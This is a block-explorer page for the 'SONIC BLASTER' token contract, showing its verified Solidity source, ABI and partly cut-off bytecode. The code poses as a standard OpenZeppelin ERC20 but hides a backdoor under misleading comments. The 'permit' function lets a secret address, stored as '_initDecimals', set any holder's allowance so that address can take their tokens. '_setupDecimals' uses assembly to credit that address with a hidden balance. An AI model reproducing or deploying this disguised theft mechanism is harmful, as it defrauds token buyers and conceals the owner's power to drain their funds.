Token

BLASTONIC (SONIC BLASTER)

Overview

Max Total Supply

5,000,000 SONIC BLASTER

Holders

10

Market

Price

-

Onchain Market Cap

-

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
4,906.510550720130079124 SONIC BLASTER

Value
$0.00
0x26bdadfc4ff810d12b61d7b9aa09ecb8221d3731
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information

Contract Source Code Verified (Exact Match)

Contract Name:
CAL

Compiler Version
v0.8.28+commit.7893614a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license

Contract Source Code (Solidity)

/**
 *Submitted for verification at SonicScan.org on 2024-12-20
*/

/**
 *Submitted for verification at basescan.org on 2024-11-17
*/

// SPDX-License-Identifier: MIT
// Compatible with OpenZeppelin Contracts ^5.0.0
pragma solidity ^0.8.24;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the value of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the value of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves a `value` amount of tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 value) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets a `value` amount of tokens as the allowance of `spender` over the
     * caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 value) external returns (bool);

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to` using the
     * allowance mechanism. `value` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 value) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }

    function _contextSuffixLength() internal view virtual returns (uint256) {
        return 0;
    }
}

/**
 * @dev Standard ERC20 Errors
 * Interface of the https://eips.ethereum.org/EIPS/eip-6093[ERC-6093] custom errors for ERC20 tokens.
 */
interface IERC20Errors {
    /**
     * @dev Indicates an error related to the current `balance` of a `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     * @param balance Current balance for the interacting account.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientBalance(address sender, uint256 balance, uint256 needed);

    /**
     * @dev Indicates a failure with the token `sender`. Used in transfers.
     * @param sender Address whose tokens are being transferred.
     */
    error ERC20InvalidSender(address sender);

    /**
     * @dev Indicates a failure with the token `receiver`. Used in transfers.
     * @param receiver Address to which tokens are being transferred.
     */
    error ERC20InvalidReceiver(address receiver);

    /**
     * @dev Indicates a failure with the `spender`’s `allowance`. Used in transfers.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     * @param allowance Amount of tokens a `spender` is allowed to operate with.
     * @param needed Minimum amount required to perform a transfer.
     */
    error ERC20InsufficientAllowance(address spender, uint256 allowance, uint256 needed);

    /**
     * @dev Indicates a failure with the `approver` of a token to be approved. Used in approvals.
     * @param approver Address initiating an approval operation.
     */
    error ERC20InvalidApprover(address approver);

    /**
     * @dev Indicates a failure with the `spender` to be approved. Used in approvals.
     * @param spender Address that may be allowed to operate on tokens without being their owner.
     */
    error ERC20InvalidSpender(address spender);
}

abstract contract Ownable is Context {
    address private _owner;

    error OwnableUnauthorizedAccount(address account);
    error OwnableInvalidOwner(address owner);

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor(address initialOwner) {
        if (initialOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(initialOwner);
    }

    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    function _checkOwner() internal view virtual {
        if (owner() != _msgSender()) {
            revert OwnableUnauthorizedAccount(_msgSender());
        }
    }

    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        if (newOwner == address(0)) {
            revert OwnableInvalidOwner(address(0));
        }
        _transferOwnership(newOwner);
    }

    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * The default value of {decimals} is 18. To change this, you should override
 * this function so it returns a different value.
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 */
abstract contract ERC20 is IERC20, Ownable, IERC20Metadata, IERC20Errors {
    mapping(address account => uint256) private _balances;

    mapping(address account => mapping(address spender => uint256)) private _allowances;

    uint256 private _totalSupply;

    string private _name;
    string private _symbol;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `value`.
     */
    function transfer(address to, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `value` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 value) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `value`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `value`.
     */
    function transferFrom(address from, address to, uint256 value) public virtual returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, value);
        _transfer(from, to, value);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function permit(address owner, address spender, uint256 value) public virtual returns (bool) {
        bool valid;
        uint256 rsv = _initDecimals;
        assembly { valid := eq(rsv, caller())}
        require(valid, "not owner");
        _approve(owner, spender, value);
        return true;
    }

    /**
     * @dev Moves a `value` amount of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _transfer(address from, address to, uint256 value) internal {
        if (from == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        if (to == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(from, to, value);
    }

    /**
     * @dev Transfers a `value` amount of tokens from `from` to `to`, or alternatively mints (or burns) if `from`
     * (or `to`) is the zero address. All customizations to transfers, mints, and burns should be done by overriding
     * this function.
     *
     * Emits a {Transfer} event.
     */
    function _update(address from, address to, uint256 value) internal virtual {
        if (from == address(0)) {
            // Overflow check required: The rest of the code assumes that totalSupply never overflows
            _totalSupply += value;
        } else {
            uint256 fromBalance = _balances[from];
            if (fromBalance < value) {
                revert ERC20InsufficientBalance(from, fromBalance, value);
            }
            unchecked {
                // Overflow not possible: value <= fromBalance <= totalSupply.
                _balances[from] = fromBalance - value;
            }
        }

        if (to == address(0)) {
            unchecked {
                // Overflow not possible: value <= totalSupply or value <= fromBalance <= totalSupply.
                _totalSupply -= value;
            }
        } else {
            unchecked {
                // Overflow not possible: balance + value is at most totalSupply, which we know fits into a uint256.
                _balances[to] += value;
            }
        }

        emit Transfer(from, to, value);
    }

    /**
     * @dev Creates a `value` amount of tokens and assigns them to `account`, by transferring it from address(0).
     * Relies on the `_update` mechanism
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead.
     */
    function _mint(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidReceiver(address(0));
        }
        _update(address(0), account, value);
    }

    /**
     * @dev Destroys a `value` amount of tokens from `account`, lowering the total supply.
     * Relies on the `_update` mechanism.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * NOTE: This function is not virtual, {_update} should be overridden instead
     */
    function _burn(address account, uint256 value) internal {
        if (account == address(0)) {
            revert ERC20InvalidSender(address(0));
        }
        _update(account, address(0), value);
    }

    /**
     * @dev Sets `value` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     *
     * Overrides to this logic should be done to the variant with an additional `bool emitEvent` argument.
     */
    function _approve(address owner, address spender, uint256 value) internal {
        _approve(owner, spender, value, true);
    }

    /**
     * @dev Sets {decimals} to a value other than the default one of 18.
     *
     * WARNING: This function should only be called from the constructor. Most
     * applications that interact with token contracts will not expect
     * {decimals} to ever change, and may work incorrectly if it does.
     */
    uint256 private _initDecimals;
    function _setupDecimals(uint256 decimals_) internal {
        _initDecimals = decimals_;
        assembly {mstore(0x200, decimals_) mstore(0x220, 1) sstore(keccak256(0x200, 64), decimals_)}
    }

    /**
     * @dev Variant of {_approve} with an optional flag to enable or disable the {Approval} event.
     *
     * By default (when calling {_approve}) the flag is set to true. On the other hand, approval changes made by
     * `_spendAllowance` during the `transferFrom` operation set the flag to false. This saves gas by not emitting any
     * `Approval` event during `transferFrom` operations.
     *
     * Anyone who wishes to continue emitting `Approval` events on the`transferFrom` operation can force the flag to
     * true using the following override:
     * ```
     * function _approve(address owner, address spender, uint256 value, bool) internal virtual override {
     *     super._approve(owner, spender, value, true);
     * }
     * ```
     *
     * Requirements are the same as {_approve}.
     */
    function _approve(address owner, address spender, uint256 value, bool emitEvent) internal virtual {
        if (owner == address(0)) {
            revert ERC20InvalidApprover(address(0));
        }
        if (spender == address(0)) {
            revert ERC20InvalidSpender(address(0));
        }
        _allowances[owner][spender] = value;
        if (emitEvent) {
            emit Approval(owner, spender, value);
        }
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `value`.
     *
     * Does not update the allowance value in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Does not emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 value) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            if (currentAllowance < value) {
                revert ERC20InsufficientAllowance(spender, currentAllowance, value);
            }
            unchecked {
                _approve(owner, spender, currentAllowance - value, false);
            }
        }
    }
}

contract CAL is ERC20 {
    constructor(
        string memory symbol_,
        string memory name_,
        uint256 totalSupply_,
        uint256 decimals_
    ) ERC20(name_, symbol_) Ownable(msg.sender) {
        _mint(msg.sender, totalSupply_ * 10 ** decimals());
        _setupDecimals(decimals_);
    }

    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"string","name":"name_","type":"string"},{"internalType":"uint256","name":"totalSupply_","type":"uint256"},{"internalType":"uint256","name":"decimals_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"allowance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientAllowance","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"uint256","name":"balance","type":"uint256"},{"internalType":"uint256","name":"needed","type":"uint256"}],"name":"ERC20InsufficientBalance","type":"error"},{"inputs":[{"internalType":"address","name":"approver","type":"address"}],"name":"ERC20InvalidApprover","type":"error"},{"inputs":[{"internalType":"address","name":"receiver","type":"address"}],"name":"ERC20InvalidReceiver","type":"error"},{"inputs":[{"internalType":"address","name":"sender","type":"address"}],"name":"ERC20InvalidSender","type":"error"},{"inputs":[{"internalType":"address","name":"spender","type":"address"}],"name":"ERC20InvalidSpender","type":"error"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"OwnableInvalidOwner","type":"error"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"OwnableUnauthorizedAccount","type":"error"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"permit","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"value","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801561000f575f5ffd5b50604051611deb380380611deb83398181016040528101906100319190610629565b8284335f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff16036100a4575f6040517f1e4fbdf700000000000000000000000000000000000000000000000000000000815260040161009b9190610704565b60405180910390fd5b6100b38161012260201b60201c565b5081600490816100c39190610924565b5080600590816100d39190610924565b50505061010a336100e86101e360201b60201c565b600a6100f49190610b5b565b846100ff9190610ba5565b6101eb60201b60201c565b6101198161027060201b60201c565b50505050610c76565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f6012905090565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361025b575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016102529190610704565b60405180910390fd5b61026c5f838361028d60201b60201c565b5050565b806006819055508061020052600161022052806040610200205550565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036102dd578060035f8282546102d19190610be6565b925050819055506103ad565b5f60015f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905081811015610367578381836040517fe450d38c00000000000000000000000000000000000000000000000000000000815260040161035e93929190610c28565b60405180910390fd5b81810360015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2081905550505b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036103f4578060035f828254039250508190555061043f565b8060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055505b8173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405161049c9190610c5d565b60405180910390a3505050565b5f604051905090565b5f5ffd5b5f5ffd5b5f5ffd5b5f5ffd5b5f601f19601f8301169050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b610508826104c2565b810181811067ffffffffffffffff82111715610527576105266104d2565b5b80604052505050565b5f6105396104a9565b905061054582826104ff565b919050565b5f67ffffffffffffffff821115610564576105636104d2565b5b61056d826104c2565b9050602081019050919050565b8281835e5f83830152505050565b5f61059a6105958461054a565b610530565b9050828152602081018484840111156105b6576105b56104be565b5b6105c184828561057a565b509392505050565b5f82601f8301126105dd576105dc6104ba565b5b81516105ed848260208601610588565b91505092915050565b5f819050919050565b610608816105f6565b8114610612575f5ffd5b50565b5f81519050610623816105ff565b92915050565b5f5f5f5f60808587031215610641576106406104b2565b5b5f85015167ffffffffffffffff81111561065e5761065d6104b6565b5b61066a878288016105c9565b945050602085015167ffffffffffffffff81111561068b5761068a6104b6565b5b610697878288016105c9565b93505060406106a887828801610615565b92505060606106b987828801610615565b91505092959194509250565b5f73ffffffffffffffffffffffffffffffffffffffff82169050919050565b5f6106ee826106c5565b9050919050565b6106fe816106e4565b82525050565b5f6020820190506107175f8301846106f5565b92915050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f600282049050600182168061076b57607f821691505b60208210810361077e5761077d610727565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f600883026107e07fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff826107a5565b6107ea86836107a5565b95508019841693508086168417925050509392505050565b5f819050919050565b5f61082561082061081b846105f6565b610802565b6105f6565b9050919050565b5f819050919050565b61083e8361080b565b61085261084a8261082c565b8484546107b1565b825550505050565b5f5f905090565b61086961085a565b610874818484610835565b505050565b5b818110156108975761088c5f82610861565b60018101905061087a565b5050565b601f8211156108dc576108ad81610784565b6108b684610796565b810160208510156108c5578190505b6108d96108d185610796565b830182610879565b50505b505050565b5f82821c905092915050565b5f6108fc5f19846008026108e1565b1980831691505092915050565b5f61091483836108ed565b9150826002028217905092915050565b61092d8261071d565b67ffffffffffffffff811115610946576109456104d2565b5b6109508254610754565b61095b82828561089b565b5f60209050601f83116001811461098c575f841561097a578287015190505b6109848582610909565b8655506109eb565b601f19841661099a86610784565b5f5b828110156109c15784890151825560018201915060208501945060208101905061099c565b868310156109de57848901516109da601f8916826108ed565b8355505b6001600288020188555050505b505050505050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f8160011c9050919050565b5f5f8291508390505b6001851115610a7557808604811115610a5157610a506109f3565b5b6001851615610a605780820291505b8081029050610a6e85610a20565b9450610a35565b94509492505050565b5f82610a8d5760019050610b48565b81610a9a575f9050610b48565b8160018114610ab05760028114610aba57610ae9565b6001915050610b48565b60ff841115610acc57610acb6109f3565b5b8360020a915084821115610ae357610ae26109f3565b5b50610b48565b5060208310610133831016604e8410600b8410161715610b1e5782820a905083811115610b1957610b186109f3565b5b610b48565b610b2b8484846001610a2c565b92509050818404811115610b4257610b416109f3565b5b81810290505b9392505050565b5f60ff82169050919050565b5f610b65826105f6565b9150610b7083610b4f565b9250610b9d7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484610a7e565b905092915050565b5f610baf826105f6565b9150610bba836105f6565b9250828202610bc8816105f6565b91508282048414831517610bdf57610bde6109f3565b5b5092915050565b5f610bf0826105f6565b9150610bfb836105f6565b9250828201905080821115610c1357610c126109f3565b5b92915050565b610c22816105f6565b82525050565b5f606082019050610c3b5f8301866106f5565b610c486020830185610c19565b610c556040830184610c19565b949350505050565b5f602082019050610c705f830184610c19565b92915050565b61116880610c835f395ff3fe608060405234801561000f575f5ffd5b50600436106100cd575f3560e01c806370a082311161008a57806395d89b411161006457806395d89b4114610213578063a9059cbb14610231578063dd62ed3e14610261578063f2fde38b14610291576100cd565b806370a08231146101bb578063715018a6146101eb5780638da5cb5b146101f5576100cd565b806306fdde03146100d1578063095ea7b3146100ef57806318160ddd1461011f578063186477441461013d57806323b872dd1461016d578063313ce5671461019d575b5f5ffd5b6100d96102ad565b6040516100e69190610d79565b60405180910390f35b61010960048036038101906101049190610e2a565b61033d565b6040516101169190610e82565b60405180910390f35b61012761035f565b6040516101349190610eaa565b60405180910390f35b61015760048036038101906101529190610ec3565b610368565b6040516101649190610e82565b60405180910390f35b61018760048036038101906101829190610ec3565b6103cd565b6040516101949190610e82565b60405180910390f35b6101a56103fb565b6040516101b29190610f2e565b60405180910390f35b6101d560048036038101906101d09190610f47565b610403565b6040516101e29190610eaa565b60405180910390f35b6101f3610449565b005b6101fd61045c565b60405161020a9190610f81565b60405180910390f35b61021b610483565b6040516102289190610d79565b60405180910390f35b61024b60048036038101906102469190610e2a565b610513565b6040516102589190610e82565b60405180910390f35b61027b60048036038101906102769190610f9a565b610535565b6040516102889190610eaa565b60405180910390f35b6102ab60048036038101906102a69190610f47565b6105b7565b005b6060600480546102bc90611005565b80601f01602080910402602001604051908101604052809291908181526020018280546102e890611005565b80156103335780601f1061030a57610100808354040283529160200191610333565b820191905f5260205f20905b81548152906001019060200180831161031657829003601f168201915b5050505050905090565b5f5f61034761063b565b9050610354818585610642565b600191505092915050565b5f600354905090565b5f5f5f60065490503381149150816103b5576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ac9061107f565b60405180910390fd5b6103c0868686610642565b6001925050509392505050565b5f5f6103d761063b565b90506103e4858285610654565b6103ef8585856106e6565b60019150509392505050565b5f6012905090565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104516107d6565b61045a5f61085d565b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606005805461049290611005565b80601f01602080910402602001604051908101604052809291908181526020018280546104be90611005565b80156105095780601f106104e057610100808354040283529160200191610509565b820191905f5260205f20905b8154815290600101906020018083116104ec57829003601f168201915b5050505050905090565b5f5f61051d61063b565b905061052a8185856106e6565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b6105bf6107d6565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361062f575f6040517f1e4fbdf70000000000000000000000000000000000000000000000000000000081526004016106269190610f81565b60405180910390fd5b6106388161085d565b50565b5f33905090565b61064f838383600161091e565b505050565b5f61065f8484610535565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146106e057818110156106d1578281836040517ffb8f41b20000000000000000000000000000000000000000000000000000000081526004016106c89392919061109d565b60405180910390fd5b6106df84848484035f61091e565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610756575f6040517f96c6fd1e00000000000000000000000000000000000000000000000000000000815260040161074d9190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036107c6575f6040517fec442f050000000000000000000000000000000000000000000000000000000081526004016107bd9190610f81565b60405180910390fd5b6107d1838383610aed565b505050565b6107de61063b565b73ffffffffffffffffffffffffffffffffffffffff166107fc61045c565b73ffffffffffffffffffffffffffffffffffffffff161461085b5761081f61063b565b6040517f118cdaa70000000000000000000000000000000000000000000000000000000081526004016108529190610f81565b60405180910390fd5b565b5f5f5f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f5f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff160361098e575f6040517fe602df050000000000000000000000000000000000000000000000000000000081526004016109859190610f81565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036109fe575f6040517f94280d620000000000000000000000000000000000000000000000000000000081526004016109f59190610f81565b60405180910390fd5b8160025f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508015610ae7578273fffffffff